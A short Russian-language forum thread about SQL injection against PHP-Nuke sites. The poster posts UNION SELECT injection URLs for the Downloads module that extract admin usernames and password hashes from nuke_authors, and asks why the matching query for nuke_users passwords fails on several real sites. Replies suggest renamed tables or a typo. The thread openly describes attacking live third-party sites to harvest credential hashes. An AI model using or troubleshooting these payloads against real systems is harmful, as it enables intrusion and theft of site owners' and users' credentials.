Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1
RSS
Опять про sql-inj в PHP-NUKE
 
Не могу понять:
почему когда я запрашиваю

www.site.com/modules.php?name=Downloads&d_op=viewdownload&ci d=-1%20union%20select%20counter,%20aid,%20pwd%20from%20nuke_ authors/*

все отлично выводится, а когда я запрашиваю

http://www.site.com/modules.php?name=Downloads&d_op=viewdown load&cid=-1%20union%20select%20user_id,%20username,%20user_p assword%20from%20nuke_users/*

то меня ожидает пустота....хотя юзвери там точно числятся.

Может я делаю чего-то не так?
 
А может просто имена таблиц изменены? Админы любят такую падлу делать!
 
Блин, ну я даже не знаю. Я пробовал уже где-то 5-6 сайтов, может больше. На них проходил 1 запрос, а второй нет. Неужели же все админы одумались и решили изменять имена таблиц.

Не, ну конечно иметь хэши админов очень занимательно, но хотелось бы в образовательных целях поиметь бы еще и юзеров.....=)
 
А вот эт врятли...может какуюнить ошибку допустил в при написании запроса?
Страницы: 1
Читают тему (гостей: 1)